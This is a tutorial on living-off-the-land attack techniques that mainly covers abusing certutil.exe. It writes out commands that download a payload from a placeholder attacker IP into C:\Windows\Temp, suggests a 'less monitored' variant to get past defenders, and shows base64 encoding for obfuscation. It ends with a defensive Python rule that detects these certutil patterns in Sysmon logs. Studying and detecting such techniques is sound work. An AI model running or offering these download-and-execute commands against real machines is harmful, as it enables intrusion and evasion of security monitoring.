Living Off the Land: Winning Without Dropping Tools
You finally land a shell after that flawless buffer overflow or SQL injection. Heart racing, you type whoami… and then it happens. You try to upload your trusty reverse shell or enumeration script, and AV instantly kills it. Or the upload fails because the box has no outbound internet access, or AppLocker is laughing at your attempts. Or worse: you only have a limited shell with no write permissions in the obvious spots. “You get a shell… AV kills your payload… what now?”
Don’t panic: live off the land.
Living Off the Land (LOTL) means using the tools and binaries already present on the target system instead of dropping your own custom payloads. It’s stealthy, it’s resilient, and it’s how real adversaries operate when things don’t go according to the upload-and-execute playbook. On Windows, these are called LOLBins (Living Off the Land Binaries). On Linux, the equivalent is usually referenced via GTFOBins, a curated list of binaries that can be abused for file transfer, execution, and privilege escalation, among other things.
MITRE ATT&CK – Concept of LOLBins / GTFOBins
Core Windows LOLBins
certutil
bitsadmin
wmic
PowerShell
Linux GTFOBins
bash
find
awk
sudo abuse
Core Windows LOLBins: A core LOLBin would be certutil.exe, aka “The Swiss Army Knife Downloader”. certutil is meant for certificate management, but it doubles as a file downloader and encoder/decoder.

File transfer (download):
cmd: certutil.exe -urlcache -split -f http://your-attacker-ip/payload.exe C:\Windows\Temp\p.exe

Alternative (sometimes less monitored):
cmd: certutil.exe -verifyctl -f http://your-attacker-ip/payload.exe C:\Windows\Temp\p.exe
You can also use it to encode/decode files (useful for obfuscation):
cmd: certutil -encode payload.exe encoded.b64
cmd: certutil -decode encoded.b64 payload.exe

Pro tip: run this from a writable directory such as %TEMP% or C:\Windows\Temp.
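From the defender's side, the same certutil switches are exactly what a process-creation detection keys on. The following is an added example, not code from the original post: a small Python rule that scans Sysmon Event ID 1 style process-creation records for certutil invoked with -urlcache or -verifyctl together with a URL, or with -encode/-decode, and additionally notes when the output path is one of the writable directories mentioned above. The field names Image, ParentImage and CommandLine follow Sysmon's schema; the sample events and the 203.0.113.5 address are constructed for the example and are not real telemetry.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, trimmed
# to the fields this rule uses). Made up for the example, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/payload.exe C:\Windows\Temp\p.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -verifyctl -f http://203.0.113.5/payload.exe C:\Windows\Temp\p.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil -decode encoded.b64 payload.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"certutil.exe -dump C:\certs\corp-ca.cer"},      # benign certificate admin use
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},         # unrelated process
]

URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
# Writable locations the post recommends as staging directories; matched case-insensitively.
WRITABLE_DIRS = (r"c:\windows\temp", r"\appdata\local\temp", r"%temp%", r"c:\users\public")


def _basename(path):
    """Last path component, lower-cased, tolerant of both slash styles and quotes."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_certutil(cmdline):
    """Return the list of LOLBin indicators found in a certutil command line.

    An empty list means the command line is either not certutil or matched
    none of the download / encode / decode patterns.
    """
    argv = cmdline.split()
    if not argv or _basename(argv[0]) not in ("certutil", "certutil.exe"):
        return []
    # certutil accepts both -flag and /flag; normalise to the bare switch name.
    flags = {a.lstrip("-/").lower() for a in argv[1:] if a[0] in "-/"}
    has_url = any(URL_RE.match(a) for a in argv[1:])

    indicators = []
    if "urlcache" in flags and has_url:
        indicators.append("urlcache_download")
    if "verifyctl" in flags and has_url:
        indicators.append("verifyctl_download")
    if "encode" in flags:
        indicators.append("base64_encode")
    if "decode" in flags or "decodehex" in flags:
        indicators.append("base64_decode")
    # Only worth flagging the staging path when an abuse pattern was already matched.
    if indicators and any(d in cmdline.lower() for d in WRITABLE_DIRS):
        indicators.append("writes_to_temp_dir")
    return indicators


def scan_events(events):
    """Run the rule over process-creation events; return (event, indicators) for each hit."""
    hits = []
    for ev in events:
        # Key on the executed image, not just the first command-line token.
        if _basename(ev.get("Image", "")) not in ("certutil", "certutil.exe"):
            continue
        ind = classify_certutil(ev.get("CommandLine", ""))
        if ind:
            hits.append((ev, ind))
    return hits


if __name__ == "__main__":
    for ev, ind in scan_events(SAMPLE_EVENTS):
        print(f"{ev['ParentImage']} -> {ev['Image']}: {', '.join(ind)}")
        print(f"    {ev['CommandLine']}")
```

Two design points matter in practice. The rule keys on the Image field rather than on the name typed at the prompt, so a copied or renamed binary is still caught as long as the Sysmon record carries the real path (OriginalFileName, where available, is an even stronger anchor). And the benign -dump invocation from an admin console produces no hit, which is the baseline you want: certutil is a legitimate certificate tool, so alerting on the URL and encode/decode switches, not on every execution, keeps the rule useful.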